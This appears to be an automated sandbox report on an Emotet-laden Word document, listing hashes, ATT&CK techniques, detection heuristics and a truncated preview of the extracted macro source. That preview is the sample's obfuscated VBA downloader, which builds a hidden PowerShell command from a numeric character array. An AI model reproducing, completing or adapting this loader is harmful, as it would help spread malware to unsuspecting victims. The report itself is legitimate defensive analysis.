Emotet Office (OLE) malware analysis — malicious · ed386c7461aa3797

MALICIOUS

Office (OLE)

105.5 KB Created: 2018-06-21 12:28:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: c2e77bdf840d1f3addf3d239a707dca8 SHA-1: 8270d2222416244c7728010c625efff91b6eeac5 SHA-256: ed386c7461aa3797a40ba3ca9bd18b43064195d71a64f03017ae0726d6cf2e92

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains heavily obfuscated VBA macros with an AutoOpen function, indicative of a downloader. Critical heuristics indicate the use of Shell() and an obfuscated loader, and ClamAV identifies it as Emotet. The VBA script attempts to construct and execute a PowerShell command, likely to download and execute a secondary payload.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-6877386-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877386-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16254 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16254 bytes
SHA-256: `dbc2700e373fd8f1387a1178105328342f6e2721d9458de55637d431aa67e9e1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zzDdqoJIJdPd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "IqMdMXBlOKsKNp" Function PzECkQvTXVm() On Error Resume Next For Each PEzmt In NazwrV rTSkd = uKOzrV = dbjCD PkzJMw = (oNAcbF * 89575 + 61882 * CInt(hCZjUO - CDbl(6338)) * 65718 * Oct(66488)) KoChd = 31143 + Atn(93747) / 33997 / Round(73246) / 43960 / CInt(hPboH) Next twCCVRwcL = "OwerSHell -j" + "oIn (( 97 ,35 " + ",28,17, 38 , 43" + " , 101 ,120" + ",101,43 ,32" + " , " + "50 , 104,42 , 3" + "9 , 47, 32,38" + " , 49," + "101,55, 36, " For Each WcXoh In fjFLtw fduWwY = CVdio = BDGTdh oLzNY = (oloUjW * 17062 + 76434 * CInt(PcuTV - CDbl(22324)) * 19933 * Oct(50352)) qSYGR = 37059 + Atn(55468) / 33949 / Round(51030) / 51608 / CInt(dlThvo) Next nlSFnmIKV = "43 " + ",33,42, 40 ," + " 126,97 , 29 " + ",41," + "29" + " ,4 , 23 ,46 ," + "10" + "1, 120 ,101, " For Each nPQdB In EZharN MRtBsl = aNYOB = dTpBM hcSpN = (nFfvm * 54490 + 89258 * CInt(FDOUIR - CDbl(3279)) * 81794 * Oct(34181)) UdBGz = 99387 + Atn(42858) / 37011 / Round(12753) / 67545 / CInt(ArKadw) Next FwTtvwV = "43 ," + " 32,50 , 1" + "04, 42 ,3" + "9 , 4" + "7, 32,38,49 , " For Each lNutM In VSEjl NaRmki = mhGQfL = NLSmP SQpiz = (KKvCV * 34770 + 91482 * CInt(RXXqtA - CDbl(45041)) * 57898 * Oct(29306)) rbzUzw = 91862 + Atn(26843) / 80595 / Round(71893) / 55034 / CInt(BqUWzY) Next YWElZjRV = "101,22" + ", " + "60, 54,49," + " 32 , 40, 10" + "7 ,11, 32, 49, " + "107" + ", 18 ,32 ,39 ," + " 6,41 ,44 , 3" + "2 " + ", 43, 49 , 1" For Each RGjko In mMOchh IuLlhl = DrZVi = tAjmiZ OfHlcw = (mihzwd * 55695 + 57898 * CInt(nqOtM - CDbl(97018)) * 56043 * Oct(15702)) nLzIsa = 73342 + Atn(36318) / 76359 / Round(46660) / 30272 / CInt(zuTCd) Next jIiFPz = "26, 97,50" + ", 4" + "7,43 ,31 " + ", 6,101 , " + "120 , " + "101 ,98, 45" + ", 49," + "49, 53,1" + "27, 106," For Each Bwosm In IlEwO zvYuzG = pEcwA = dqWFaI aPEWD = (zDtGwp * 30726 + 36965 * CInt(TioZw - CDbl(10248)) * 71699 * Oct(64231)) zzcTtp = 5842 + Atn(30343) / 44611 / Round(30585) / 10511 / CInt(ibYIZC) Next OjjkwXwEj = "106 , 50 , 5" + "0,50 ,107, 38," + " 43,44, 43 " + ", 44" + " , 43 , 107 ,38" + " ,42" + " ,40, 106" + ",125" + ", 8,1" + ",41 , 125 ,3" For Each nkJkn In KVFwD nOpwj = zRTWa = vwbqU idmfzS = (BKDGR * 78284 + 45109 * CInt(RWEhw - CDbl(4411)) * 44977 * Oct(40076)) skirw = 30010 + Atn(23252) / 84952 / Round(96809) / 1519 / CInt(HrHIc) Next tOMwBCNc = "3 ,124,106" + ",5 , 45 , 49 ," + "49 ,53 ,12" + "7 ,106,106" + ", 50,50 , 50 ,1" For Each jcHSqF In wSwzWa otdTOW = Xaiqc = vvQCV qcAikj = (SamqVw * 99913 + 23680 * CInt(TDTFrO - CDbl(25117)) * 67820 * Oct(4334)) UIpmmc = 88579 + Atn(4664) / 40752 / Round(72863) / 55204 / CInt(RcFrC) Next vHZqkoj = "07,33 ,55 ," + " 32 ,51 , 4" + "2 " + ", 54,49" + " ,60,41 , 32, 1" + "07, 38, 42 " + ",40 ,10" + "7 , 48 , 36 ,1" + "06" + " , 36 , 124, 11" PzECkQvTXVm = twCCVRwcL + nlSFnmIKV + FwTtvwV + YWElZjRV + jIiFPz + OjjkwXwEj + tOMwBCNc + vHZqkoj End Function Function YKILspToChM() On Error Resume Next For Each HXUzZZ In prfXJa XiPEz = OiLKQX = ujrvz rHhWz = (rqUTC * 71703 + 95551 * CInt(YAREt - CDbl(54210)) * 90982 * Oct(95843)) CBuob = 34970 + Atn(31917) / 82626 / Round(26696) / 37545 / CInt(wQuBK) Next ntVJNzjKo = "8,117," + "61," + " 124 , 1" + "06, 5" + ", 45,49 , 4" + "9 ," + " 53, 127 , 106" + " ,10" For Each kCuEGp In ajrPFh wLDOv = BljGST = wvhswQ zfivF = (unmjuA * 21099 + 90775 * CInt(AdIkw - CDbl(14197)) * 86447 * Oct(5707)) KFiwO = 61808 + Atn(28139) / 12696 / Round(39706) / 71379 / CInt(EcSwt) Next cXjNQANmQk = "6 ," + " 39 ,47, " + "45" + ", 35,60,54 " + ",107 ,38, 42 ," For Each jsMfI In EcsOi DDiBl = TVRkt = jubmQ CEKcp = (qhHzP * 22282 + 90235 * CInt(uBOrT - CDbl(330)) * 3862 * Oct(16982)) LRjdA = 69568 + Atn(84565) / 49304 / Round(6068) / 27047 / CInt(viKus) Next hNKuj = "40 , 106, ... (truncated)

SHA-256: dbc2700e373fd8f1387a1178105328342f6e2721d9458de55637d431aa67e9e1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zzDdqoJIJdPd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IqMdMXBlOKsKNp"
Function PzECkQvTXVm()
On Error Resume Next
For Each PEzmt In NazwrV
rTSkd = uKOzrV = dbjCD
PkzJMw = (oNAcbF * 89575 + 61882 * CInt(hCZjUO - CDbl(6338)) * 65718 * Oct(66488))
KoChd = 31143 + Atn(93747) / 33997 / Round(73246) / 43960 / CInt(hPboH)
Next
twCCVRwcL = "OwerSHell  -j" + "oIn (( 97 ,35 " + ",28,17, 38 , 43" + " , 101 ,120" + ",101,43 ,32" + " , " + "50 , 104,42 , 3" + "9 , 47, 32,38" + " , 49," + "101,55, 36, "
For Each WcXoh In fjFLtw
fduWwY = CVdio = BDGTdh
oLzNY = (oloUjW * 17062 + 76434 * CInt(PcuTV - CDbl(22324)) * 19933 * Oct(50352))
qSYGR = 37059 + Atn(55468) / 33949 / Round(51030) / 51608 / CInt(dlThvo)
Next
nlSFnmIKV = "43 " + ",33,42, 40 ," + " 126,97 , 29 " + ",41," + "29" + " ,4 , 23 ,46 ," + "10" + "1, 120 ,101, "
For Each nPQdB In EZharN
MRtBsl = aNYOB = dTpBM
hcSpN = (nFfvm * 54490 + 89258 * CInt(FDOUIR - CDbl(3279)) * 81794 * Oct(34181))
UdBGz = 99387 + Atn(42858) / 37011 / Round(12753) / 67545 / CInt(ArKadw)
Next
FwTtvwV = "43 ," + " 32,50 , 1" + "04, 42 ,3" + "9 , 4" + "7, 32,38,49 , "
For Each lNutM In VSEjl
NaRmki = mhGQfL = NLSmP
SQpiz = (KKvCV * 34770 + 91482 * CInt(RXXqtA - CDbl(45041)) * 57898 * Oct(29306))
rbzUzw = 91862 + Atn(26843) / 80595 / Round(71893) / 55034 / CInt(BqUWzY)
Next
YWElZjRV = "101,22" + ", " + "60, 54,49," + " 32 , 40, 10" + "7 ,11, 32, 49, " + "107" + ", 18 ,32 ,39 ," + " 6,41 ,44 , 3" + "2 " + ", 43, 49 , 1"
For Each RGjko In mMOchh
IuLlhl = DrZVi = tAjmiZ
OfHlcw = (mihzwd * 55695 + 57898 * CInt(nqOtM - CDbl(97018)) * 56043 * Oct(15702))
nLzIsa = 73342 + Atn(36318) / 76359 / Round(46660) / 30272 / CInt(zuTCd)
Next
jIiFPz = "26, 97,50" + ", 4" + "7,43 ,31 " + ", 6,101 , " + "120 , " + "101 ,98, 45" + ", 49," + "49, 53,1" + "27, 106,"
For Each Bwosm In IlEwO
zvYuzG = pEcwA = dqWFaI
aPEWD = (zDtGwp * 30726 + 36965 * CInt(TioZw - CDbl(10248)) * 71699 * Oct(64231))
zzcTtp = 5842 + Atn(30343) / 44611 / Round(30585) / 10511 / CInt(ibYIZC)
Next
OjjkwXwEj = "106 , 50 , 5" + "0,50 ,107, 38," + " 43,44, 43 " + ", 44" + " , 43 , 107 ,38" + " ,42" + " ,40, 106" + ",125" + ", 8,1" + ",41 , 125 ,3"
For Each nkJkn In KVFwD
nOpwj = zRTWa = vwbqU
idmfzS = (BKDGR * 78284 + 45109 * CInt(RWEhw - CDbl(4411)) * 44977 * Oct(40076))
skirw = 30010 + Atn(23252) / 84952 / Round(96809) / 1519 / CInt(HrHIc)
Next
tOMwBCNc = "3 ,124,106" + ",5 , 45 , 49 ," + "49 ,53 ,12" + "7 ,106,106" + ", 50,50 , 50 ,1"
For Each jcHSqF In wSwzWa
otdTOW = Xaiqc = vvQCV
qcAikj = (SamqVw * 99913 + 23680 * CInt(TDTFrO - CDbl(25117)) * 67820 * Oct(4334))
UIpmmc = 88579 + Atn(4664) / 40752 / Round(72863) / 55204 / CInt(RcFrC)
Next
vHZqkoj = "07,33 ,55 ," + " 32 ,51 , 4" + "2 " + ", 54,49" + " ,60,41 , 32, 1" + "07, 38, 42 " + ",40 ,10" + "7 , 48 , 36 ,1" + "06" + " , 36 , 124, 11"
PzECkQvTXVm = twCCVRwcL + nlSFnmIKV + FwTtvwV + YWElZjRV + jIiFPz + OjjkwXwEj + tOMwBCNc + vHZqkoj
End Function
Function YKILspToChM()
On Error Resume Next
For Each HXUzZZ In prfXJa
XiPEz = OiLKQX = ujrvz
rHhWz = (rqUTC * 71703 + 95551 * CInt(YAREt - CDbl(54210)) * 90982 * Oct(95843))
CBuob = 34970 + Atn(31917) / 82626 / Round(26696) / 37545 / CInt(wQuBK)
Next
ntVJNzjKo = "8,117," + "61," + " 124 , 1" + "06, 5" + ", 45,49 , 4" + "9 ," + " 53, 127 , 106" + " ,10"
For Each kCuEGp In ajrPFh
wLDOv = BljGST = wvhswQ
zfivF = (unmjuA * 21099 + 90775 * CInt(AdIkw - CDbl(14197)) * 86447 * Oct(5707))
KFiwO = 61808 + Atn(28139) / 12696 / Round(39706) / 71379 / CInt(EcSwt)
Next
cXjNQANmQk = "6 ," + " 39 ,47, " + "45" + ", 35,60,54 " + ",107 ,38, 42 ,"
For Each jsMfI In EcsOi
DDiBl = TVRkt = jubmQ
CEKcp = (qhHzP * 22282 + 90235 * CInt(uBOrT - CDbl(330)) * 3862 * Oct(16982))
LRjdA = 69568 + Atn(84565) / 49304 / Round(6068) / 27047 / CInt(viKus)
Next
hNKuj = "40 , 106,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.